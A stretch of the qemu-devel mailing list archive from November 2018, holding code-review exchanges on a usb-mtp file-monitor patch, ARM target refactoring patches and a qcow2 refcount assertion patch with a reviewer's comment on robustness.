> > +MTPState *s = opaque;
> > +int watchfd = 0;
> > +MTPObject *parent = usb_mtp_object_lookup_wd(s, wd);
> > +MTPMonEntry *entry = NULL;
> > +MTPObject *o;
> > +
> > +if (!parent) {
> > +return;
> > +}
> > +
> > +switch (ev) {
> > +case QFILE_MONITOR_EVENT_CREATED:
> > +if (usb_mtp_object_lookup_name(parent, name, -1)) {
> > +/* Duplicate create event */
> >  return;
> >  }
> > +entry = g_new0(MTPMonEntry, 1);
> > +entry->handle = s->next_handle;
> > +entry->event = EVT_OBJ_ADDED;
> > +o = usb_mtp_add_child(s, parent, name);
> > +if (!o) {
> > +g_free(entry);
> > +return;
> > +}
> > +o->watchfd = watchfd;
> 
> this effectively always set o->watchfd to 0, which is already
> initialized to 0 with g_new0(), you can drop it

Yeah, pre-existing pointless code, so I've dropped it.


> >  static void usb_mtp_object_readdir(MTPState *s, MTPObject *o)
> >  {
> >  struct dirent *entry;
> >  DIR *dir;
> > +Error *err = NULL;
> >
> >  if (o->have_children) {
> >  return;
> > @@ -662,16 +596,19 @@ static void usb_mtp_object_readdir(MTPState *s, 
> > MTPObject *o)
> >  if (!dir) {
> >  return;
> >  }
> > -#ifdef CONFIG_INOTIFY1
> > -int watchfd = usb_mtp_add_watch(s->inotifyfd, o->path);
> > +
> > +int watchfd = qemu_file_monitor_add_watch(s->file_monitor, o->path, 
> > NULL,
> > +  file_monitor_event, s, );
> 
> There is an add_watch(), but I don't see the corresponding
> remove_watch(). This may probably cause crashes if MTPState is freed.

Yes, I've added code to remove the watch, and also
to use a private file_monitor instance so free'ing
that will release all watches as a safety net.

> 
> >  if (watchfd == -1) {
> > -fprintf(stderr, "usb-mtp: failed to add watch for %s\n", o->path);
> > +fprintf(stderr, "usb-mtp: failed to add watch for %s: %s\n", 
> > o->path,
> > +error_get_pretty(err));
> 
> maybe it's a good time to turn into error_report() ?

Yep


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

2018-11-13 Thread Peter Maydell
On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> From: Philippe Mathieu-Daudé 
>
> Signed-off-by: Philippe Mathieu-Daudé 
> Reviewed-by: Robert Bradford 
> Reviewed-by: Samuel Ortiz 
> ---
>  target/arm/helper.c | 3 ---
>  1 file changed, 3 deletions(-)
>
> diff --git a/target/arm/helper.c b/target/arm/helper.c
> index 3d4e9c5c8a..27d9285e1e 100644
> --- a/target/arm/helper.c
> +++ b/target/arm/helper.c
> @@ -12,13 +12,10 @@
>  #include "internals.h"
>  #include "exec/gdbstub.h"
>  #include "exec/helper-proto.h"
> -#include "qemu/host-utils.h"

This is for muldiv64().

>  #include "sysemu/arch_init.h"
>  #include "sysemu/sysemu.h"
> -#include "qemu/bitops.h"

This is for extract32() and friends.

>  #include "qemu/crc32c.h"
>  #include "exec/exec-all.h"
> -#include "exec/cpu_ldst.h"

This is for cpu_stl_data().

>  #include "arm_ldst.h"
>  #include  /* For crc32 */
>  #include "exec/semihost.h"

thanks
-- PMM



Re: [Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

2018-11-13 Thread Philippe Mathieu-Daudé

On 13/11/18 17:58, Peter Maydell wrote:

On 13 November 2018 at 16:52, Samuel Ortiz  wrote:

From: Philippe Mathieu-Daudé 

Signed-off-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
Reviewed-by: Samuel Ortiz 
---
  target/arm/helper.c | 7 +++
  1 file changed, 7 insertions(+)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 0da1424f72..3d4e9c5c8a 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -1,3 +1,10 @@
+/*
+ * ARM generic helpers.
+ *
+ * This code is licensed under the GNU GPL v2.
+ *
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */


The human readable text says "v2", but the SPDX tag says
"v2 or later". Which is right? (The top level LICENSE file says
source files with no specific license are 2-or-later).


Sorry, the human failed, the machine is right.



[Qemu-devel] [PATCH 04/13] target: arm: Move all interrupt and exception handlers into their own file

2018-11-13 Thread Samuel Ortiz
Most of them are TCG dependent, so we want to be able to leave them out of
the build in order to support disabling TCG on ARM.

Signed-off-by: Samuel Ortiz 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/excp_helper.c | 550 +++
 target/arm/helper.c  | 531 -
 target/arm/Makefile.objs |   2 +-
 3 files changed, 551 insertions(+), 532 deletions(-)
 create mode 100644 target/arm/excp_helper.c

diff --git a/target/arm/excp_helper.c b/target/arm/excp_helper.c
new file mode 100644
index 00..38fe9703de
--- /dev/null
+++ b/target/arm/excp_helper.c
@@ -0,0 +1,550 @@
+/*
+ * Exception and interrupt helpers.
+ *
+ * This code is licensed under the GNU GPL v2 and later.
+ *
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+#include "qemu/osdep.h"
+#include "trace.h"
+#include "cpu.h"
+#include "internals.h"
+#include "sysemu/sysemu.h"
+#include "exec/exec-all.h"
+#include "exec/cpu_ldst.h"
+#include "arm_ldst.h"
+#include "exec/semihost.h"
+#include "sysemu/kvm.h"
+
+static void take_aarch32_exception(CPUARMState *env, int new_mode,
+   uint32_t mask, uint32_t offset,
+   uint32_t newpc)
+{
+/* Change the CPU state so as to actually take the exception. */
+switch_mode(env, new_mode);
+/*
+ * For exceptions taken to AArch32 we must clear the SS bit in both
+ * PSTATE and in the old-state value we save to SPSR_, so zero it 
now.
+ */
+env->uncached_cpsr &= ~PSTATE_SS;
+env->spsr = cpsr_read(env);
+/* Clear IT bits.  */
+env->condexec_bits = 0;
+/* Switch to the new mode, and to the correct instruction set.  */
+env->uncached_cpsr = (env->uncached_cpsr & ~CPSR_M) | new_mode;
+/* Set new mode endianness */
+env->uncached_cpsr &= ~CPSR_E;
+if (env->cp15.sctlr_el[arm_current_el(env)] & SCTLR_EE) {
+env->uncached_cpsr |= CPSR_E;
+}
+/* J and IL must always be cleared for exception entry */
+env->uncached_cpsr &= ~(CPSR_IL | CPSR_J);
+env->daif |= mask;
+
+if (new_mode == ARM_CPU_MODE_HYP) {
+env->thumb = (env->cp15.sctlr_el[2] & SCTLR_TE) != 0;
+env->elr_el[2] = env->regs[15];
+} else {
+/*
+ * this is a lie, as there was no c1_sys on V4T/V5, but who cares
+ * and we should just guard the thumb mode on V4
+ */
+if (arm_feature(env, ARM_FEATURE_V4T)) {
+env->thumb =
+(A32_BANKED_CURRENT_REG_GET(env, sctlr) & SCTLR_TE) != 0;
+}
+env->regs[14] = env->regs[15] + offset;
+}
+env->regs[15] = newpc;
+}
+
+static void arm_cpu_do_interrupt_aarch32_hyp(CPUState *cs)
+{
+/*
+ * Handle exception entry to Hyp mode; this is sufficiently
+ * different to entry to other AArch32 modes that we handle it
+ * separately here.
+ *
+ * The vector table entry used is always the 0x14 Hyp mode entry point,
+ * unless this is an UNDEF/HVC/abort taken from Hyp to Hyp.
+ * The offset applied to the preferred return address is always zero
+ * (see DDI0487C.a section G1.12.3).
+ * PSTATE A/I/F masks are set based only on the SCR.EA/IRQ/FIQ values.
+ */
+uint32_t addr, mask;
+ARMCPU *cpu = ARM_CPU(cs);
+CPUARMState *env = >env;
+
+switch (cs->exception_index) {
+case EXCP_UDEF:
+addr = 0x04;
+break;
+case EXCP_SWI:
+addr = 0x14;
+break;
+case EXCP_BKPT:
+/* Fall through to prefetch abort.  */
+case EXCP_PREFETCH_ABORT:
+env->cp15.ifar_s = env->exception.vaddress;
+qemu_log_mask(CPU_LOG_INT, "...with HIFAR 0x%x\n",
+  (uint32_t)env->exception.vaddress);
+addr = 0x0c;
+break;
+case EXCP_DATA_ABORT:
+env->cp15.dfar_s = env->exception.vaddress;
+qemu_log_mask(CPU_LOG_INT, "...with HDFAR 0x%x\n",
+  (uint32_t)env->exception.vaddress);
+addr = 0x10;
+break;
+case EXCP_IRQ:
+addr = 0x18;
+break;
+case EXCP_FIQ:
+addr = 0x1c;
+break;
+case EXCP_HVC:
+addr = 0x08;
+break;
+case EXCP_HYP_TRAP:
+addr = 0x14;
+default:
+cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index);
+}
+
+if (cs->exception_index != EXCP_IRQ && cs->exception_index != EXCP_FIQ) {
+if (!arm_feature(env, ARM_FEATURE_V8)) {
+/*
+ * QEMU syndrome values are v8-style. v7 has the IL bit
+ * UNK/SBZP for "field not valid" cases, where v8 uses RES1.
+ * If this is a v7 CPU, squash the IL bit in those cases.
+ */
+if (cs->exception_index == EXCP_PREFETCH_ABORT ||
+(cs->exception_index == EXCP_DATA_ABORT &&
+ !(env->exception.syndrome & ARM_EL_ISV)) ||
+syn_get_ec(env->exception.syndrome) == 

[Qemu-devel] [PATCH] qcow2: Assert that refcount block offsets fit in the refcount table

2018-11-13 Thread Alberto Garcia
Refcount table entries have a field to store the offset of the
refcount block. The rest of the bits of the entry are currently
reserved.

The offset is always taken from the entry using REFT_OFFSET_MASK to
ensure that we only use the bits that belong to that field.

While that mask is used every time we read from the refcount table, it
is never used when we write to it. Due to the other constraints of the
qcow2 format QEMU can never produce refcount block offsets that don't
fit in that field so any such offset when allocating a refcount block
would indicate a bug in QEMU.
---
 block/qcow2-refcount.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/block/qcow2-refcount.c b/block/qcow2-refcount.c
index 46082aeac1..31a2e1f845 100644
--- a/block/qcow2-refcount.c
+++ b/block/qcow2-refcount.c
@@ -367,6 +367,9 @@ static int alloc_refcount_block(BlockDriverState *bs,
 return new_block;
 }
 
+/* The offset must fit in the offset field of the refcount table entry */
+assert((new_block & REFT_OFFSET_MASK) == new_block);
+
 /* If we're allocating the block at offset 0 then something is wrong */
 if (new_block == 0) {
 qcow2_signal_corruption(bs, true, -1, -1, "Preventing invalid "
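Review bot: The new assert at the top of the hunk aborts the whole process on a condition that, per the description, only a QEMU bug can produce, while the check immediately below treats the equally "impossible" `new_block == 0` case as image corruption via `qcow2_signal_corruption()` and returns an error. If `new_block` can be influenced by on-disk metadata (refcount table size, cluster count), an assert is a crash that a crafted image could reach, and the `qcow2_signal_corruption()` path would be the consistent and more robust response; if it cannot, the comment should say why the two cases differ, e.g. `/* new_block is bounded by the qcow2 cluster and refcount-table limits, so a value outside REFT_OFFSET_MASK can only come from a QEMU bug, never from the image */`. alloc_refcount_block() starts and ends outside the hunk, so the derivation of `new_block` is not visible here.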
-- 
2.11.0



